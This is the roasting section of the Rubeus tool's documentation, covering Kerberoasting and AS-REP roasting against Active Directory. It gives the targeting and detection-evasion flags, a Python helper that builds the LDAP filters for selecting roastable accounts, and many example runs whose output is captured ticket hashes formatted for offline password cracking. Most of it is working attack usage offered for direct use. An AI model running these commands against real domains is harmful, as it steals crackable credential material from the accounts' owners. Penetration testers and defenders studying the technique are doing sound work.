Roasting
Breakdown of the roasting commands:

| Command | Description |
| --- | --- |
| kerberoast | Perform Kerberoasting against all (or specified) users |
| asreproast | Perform AS-REP roasting against all (or specified) users |
kerberoast
The kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action by default uses the KerberosRequestorSecurityToken.GetRequest() method (https://msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken.getrequest(v=vs.110).aspx), the approach contributed to PowerView by @machosec, to request the service ticket (see the opsec table for how the other request modes differ). Unlike SharpRoast, this action performs proper ASN.1 parsing of the result structures.
With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /stats flag will output statistics about the kerberoastable users found, including a breakdown of supported encryption types and the years user passwords were last set, without sending any ticket requests. This flag can be combined with the other targeting options.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
If the /simple flag is specified, roasted hashes will be output to the console, one per line.
If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.
If a TGT is supplied with /ticket:X (the base64 encoding of a .kirbi file, or the path to a .kirbi file on disk), that TGT is used to request the service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file containing one SPN per line, or a comma-separated list), no LDAP searching for users happens, so roasting can be done from a non-domain-joined system in conjunction with /dc:Z.
If the /tgtdeleg flag is supplied, the tgtdeleg trick is used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.
If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.
If the /rc4opsec flag is specified, the tgtdeleg trick is used, and only accounts without AES enabled are enumerated and roasted.
If you want to use alternate domain credentials for Kerberoasting (and for searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.
If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.
If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 argument can be combined with it to add a percentage of jitter to that delay.
If the /enterprise flag is used, the SPN is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when Kerberoasting with a TGT.
If the /autoenterprise flag is used and roasting an SPN fails (due to an invalid or duplicate SPN), Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied, as Rubeus needs to know the target account's samAccountName, which it gets when querying LDAP for the account information.
kerberoasting opsec
Here is a table comparing the behavior of various flags from an opsec perspective:

| Arguments | Description |
| --- | --- |
| none | Use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption |
| /tgtdeleg | Use the tgtdeleg trick to perform TGS-REQ requests of RC4-enabled accounts, roast all accounts w/ RC4 specified |
| /ticket:X | Use the supplied TGT blob/file for TGS-REQ requests, roast all accounts w/ RC4 specified |
| /rc4opsec | Use the tgtdeleg trick, enumerate accounts without AES enabled, roast w/ RC4 specified |
| /aes | Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption |
| /aes /tgtdeleg | Use the tgtdeleg trick, enumerate accounts with AES enabled, roast w/ AES specified |
| /pwdsetafter:X | Use the supplied date and only enumerate accounts with password last changed after that date |
| /pwdsetbefore:X | Use the supplied date and only enumerate accounts with password last changed before that date |
| /resultlimit:X | Use the specified number to limit the accounts that will be roasted |
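The targeting options and the /stats breakdown above come down to one LDAP query plus a little bookkeeping on two attributes, msDS-SupportedEncryptionTypes and pwdLastSet. The following Python is an added example, not Rubeus code: it builds the kind of filter the /pwdsetafter, /pwdsetbefore, /rc4opsec, /aes and /ldapfilter arguments imply, decodes the encryption-type bitmask the way the /stats table labels it, and models which etype a request ends up asking for according to the opsec table. The exact filter terms, the helper names and the sample records are assumptions (the filter is assumed to mirror the PowerView-style query Rubeus uses); check it against what your own LDAP client returns before relying on it.

```python
"""Reproduce the LDAP targeting and the /stats summary of the kerberoast action,
offline, on constructed records. Added example, not Rubeus code: the filter
terms are assumed to mirror Rubeus's own (PowerView-style) query."""
from collections import Counter
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7). An unset or 0 attribute
# means the DC falls back to RC4, which the /stats table prints as RC4_HMAC_DEFAULT.
ETYPE_FLAGS = {0x1: "DES_CBC_CRC", 0x2: "DES_CBC_MD5", 0x4: "RC4_HMAC",
               0x8: "AES128_CTS_HMAC_SHA1_96", 0x10: "AES256_CTS_HMAC_SHA1_96"}
AES_MASK = 0x8 | 0x10                     # 24: the value the /aes and /rc4opsec filters test
LDAP_BIT_AND = "1.2.840.113556.1.4.803"   # LDAP_MATCHING_RULE_BIT_AND
LDAP_BIT_OR = "1.2.840.113556.1.4.804"    # LDAP_MATCHING_RULE_BIT_OR
UAC_ACCOUNTDISABLE = 0x2
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """datetime -> 100ns intervals since 1601, the integer AD stores in pwdLastSet."""
    delta = dt - FILETIME_EPOCH          # integer math only, so large values stay exact
    return ((delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds) * 10


def from_filetime(ft):
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_roast_date(s):
    """/pwdsetafter and /pwdsetbefore take MM-dd-yyyy."""
    return datetime.strptime(s, "%m-%d-%Y").replace(tzinfo=timezone.utc)


def build_kerberoast_filter(pwd_set_after=None, pwd_set_before=None,
                            rc4_only=False, aes_only=False, ldapfilter=None):
    """LDAP filter for Kerberoastable users, narrowed the way /pwdsetafter,
    /pwdsetbefore, /rc4opsec, /aes and /ldapfilter narrow it (assumed terms)."""
    terms = [
        "(samAccountType=805306368)",               # user objects only
        "(servicePrincipalName=*)",
        "(!(samAccountName=krbtgt))",               # random key, never crackable
        f"(!(userAccountControl:{LDAP_BIT_AND}:={UAC_ACCOUNTDISABLE}))",  # skip disabled
    ]
    if pwd_set_after:
        terms.append(f"(pwdlastset>={to_filetime(parse_roast_date(pwd_set_after))})")
    if pwd_set_before:
        terms.append(f"(pwdlastset<={to_filetime(parse_roast_date(pwd_set_before))})")
    if rc4_only:   # /rc4opsec: no AES bit set, so an RC4 TGS-REQ is this account's normal traffic
        terms.append(f"(!(msDS-SupportedEncryptionTypes:{LDAP_BIT_OR}:={AES_MASK}))")
    if aes_only:   # /aes: at least one AES bit set (bitwise-OR matching rule)
        terms.append(f"(msDS-SupportedEncryptionTypes:{LDAP_BIT_OR}:={AES_MASK})")
    if ldapfilter:
        terms.append(ldapfilter if ldapfilter.startswith("(") else f"({ldapfilter})")
    return "(&" + "".join(terms) + ")"


def etype_label(value):
    """Render msDS-SupportedEncryptionTypes the way the /stats table does."""
    if not value:
        return "RC4_HMAC_DEFAULT"
    return ", ".join(name for bit, name in ETYPE_FLAGS.items() if value & bit)


def requested_etype(supported, via_tgt=False, aes=False):
    """Etype the roast ends up asking for, per the opsec table: the default
    KerberosRequestorSecurityToken path gets the account's highest supported type;
    /tgtdeleg and /ticket ask for RC4 unless /aes is combined with them."""
    supported = supported or 0
    if via_tgt and not aes:
        return "RC4_HMAC"
    if supported & 0x10:
        return "AES256_CTS_HMAC_SHA1_96"
    if supported & 0x8:
        return "AES128_CTS_HMAC_SHA1_96"
    return "RC4_HMAC"


def roast_stats(records):
    """What /stats prints: counts by supported-etype set and by pwdLastSet year.
    records: dicts with 'msDS-SupportedEncryptionTypes' (int or None) and 'pwdLastSet'."""
    etypes = Counter(etype_label(r.get("msDS-SupportedEncryptionTypes")) for r in records)
    years = Counter(from_filetime(r["pwdLastSet"]).year for r in records)
    return etypes, years


# Constructed records standing in for LDAP results (hypothetical accounts).
SAMPLE_USERS = [
    {"sam": "svc_sql",   "msDS-SupportedEncryptionTypes": None, "pwdLastSet": to_filetime(parse_roast_date("05-31-2008"))},
    {"sam": "svc_web",   "msDS-SupportedEncryptionTypes": 0x4,  "pwdLastSet": to_filetime(parse_roast_date("09-05-2009"))},
    {"sam": "svc_aes",   "msDS-SupportedEncryptionTypes": 0x18, "pwdLastSet": to_filetime(parse_roast_date("01-10-2019"))},
    {"sam": "svc_mixed", "msDS-SupportedEncryptionTypes": 0x1c, "pwdLastSet": to_filetime(parse_roast_date("06-01-2019"))},
]

if __name__ == "__main__":
    print(build_kerberoast_filter(pwd_set_after="01-31-2005", pwd_set_before="03-29-2010", rc4_only=True))
    etypes, years = roast_stats(SAMPLE_USERS)
    for label, n in etypes.items():
        print(f"{label:<60} {n}")
    for year, n in sorted(years.items()):
        print(f"{year} {n}")
    for u in SAMPLE_USERS:
        print(u["sam"], "tgtdeleg ->", requested_etype(u["msDS-SupportedEncryptionTypes"], via_tgt=True))
```

Running it prints the /rc4opsec-narrowed filter for the 2005 to 2010 window used in the /tgtdeleg example on this page, then the two count tables. The 1.2.840.113556.1.4.804 rule is the LDAP bitwise-OR match, which is what lets "any AES bit set" be expressed in a single filter term; its negation is the whole of what /rc4opsec adds to the query.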
Examples
Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:
C:\Rubeus>Rubeus.exe kerberoast
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Kerberoasting
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...
[*] SamAccountName : sqlservice
[*] DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : MSSQLSvc/SQL.testlab.local
[*] Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...
...(snip)...
Kerberoasting all users in a specific OU, saving the hashes to an output file:
C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt
v1.3.4
[*] Action: Kerberoasting
[*] Target OU : OU=TestingOU,DC=testlab,DC=local
[*] SamAccountName : testuser2
[*] DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
[*] ServicePrincipalName : service/host
[*] Hash written to C:\Temp\hashes.txt
[*] Roasted hashes written to : C:\Temp\hashes.txt
Perform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:
C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3
v1.5.0
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned
[*] Total kerberoastable users : 3
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName : testspn/server
[*] PwdLastSet : 5/31/2008 12:00:02 AM
[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...
[*] SamAccountName : constraineduser
[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123
[*] PwdLastSet : 9/5/2009 7:48:50 PM
[*] Supported ETypes : RC4_HMAC
[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...
[*] SamAccountName : newuser
[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123456
[*] PwdLastSet : 9/12/2008 8:05:16 PM
[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...
List statistics about found Kerberoastable accounts without actually sending ticket requests:
C:\Rubeus>Rubeus.exe kerberoast /stats
v1.5.0
[*] Action: Kerberoasting
[*] Listing statistics about target users, no ticket requests being performed.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 4
----------------------------------------------------------------------
| Supported Encryption Type | Count |
----------------------------------------------------------------------
| RC4_HMAC_DEFAULT | 1 |
| RC4_HMAC | 1 |
| AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |
| RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |
----------------------------------------------------------------------
----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2019 | 4 |
----------------------------------
Kerberoasting a specific user, with simplified hash output:
C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target User : harmj0y
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 1
$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...
Kerberoasting all users in a foreign trusting domain, not line-wrapping the results:
C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap
v1.5.0
[*] Action: Kerberoasting
[*] Target Domain : dev.testlab.local
[*] SamAccountName : jason
[*] DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
[*] ServicePrincipalName : test/test
[*] Hash : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...
Kerberoasting using an existing TGT:
C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local
v1.3.5
[*] Action: Kerberoasting
[*] Using a TGT /ticket to request service tickets
[*] Target SPN : asdf/asdfasdf
[*] Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...
"Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:
C:\Rubeus>Rubeus.exe kerberoast /rc4opsec
v1.3.6
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Found 6 users to Kerberoast!
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...
asreproast
The asreproast action replaces the ASREPRoast project, which executed similar actions with the (larger sized) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user without knowing their password, and the component of the structure encrypted with the user's key can be cracked offline, much like Kerberoasting. For more technical information, see this post.
Just as with the kerberoast command, if no other arguments are supplied, all user accounts that do not require Kerberos preauthentication are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
Also, if you want to use alternate domain credentials for AS-REP roasting, they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
The output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option, producing hashes for hashcat mode 18200.
AS-REP roasting all users in the current domain:
C:\Rubeus>Rubeus.exe asreproast
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : testlab.local
[*] SamAccountName : dfm.a
[*] DistinguishedName : CN=dfm.a,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 163 bytes
[*] Received 1537 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..
[*] SamAccountName : harmj0y2
[*] DistinguishedName : CN=harmj0y2,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2'
[*] Connecting to 192.168.52.100:88
[*] Sent 166 bytes
[*] Received 1407 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..
AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:
C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt
v1.3.4
[*] Action: AS-REP roasting
[*] Target OU : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Temp\hashes.txt
[*] Roasted hashes written to : C:\Temp\hashes.txt
AS-REP roasting a specific user:
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
v1.3.4
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
AS-REP roasting all users in a foreign trusting domain:
C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : dev.testlab.local
[*] SamAccountName : devuser3
[*] DistinguishedName : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local
[*] Using domain controller: dev.testlab.local (192.168.52.105)
[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3'
[*] Connecting to 192.168.52.105:88
[*] Sent 175 bytes
[*] Received 1448 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...
AS-REP roasting users in a foreign non-trusting domain using alternate credentials:
C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!"
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : external.local
[*] Using alternate creds : EXTERNAL.local\administrator
[*] SamAccountName : david
[*] DistinguishedName : CN=david,CN=Users,DC=external,DC=local
[*] Using domain controller: external.local (192.168.52.95)
[*] Building AS-REQ (w/o preauth) for: 'external.local\david'
[*] Connecting to 192.168.52.95:88
[*] Sent 165 bytes
[*] Received 1376 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...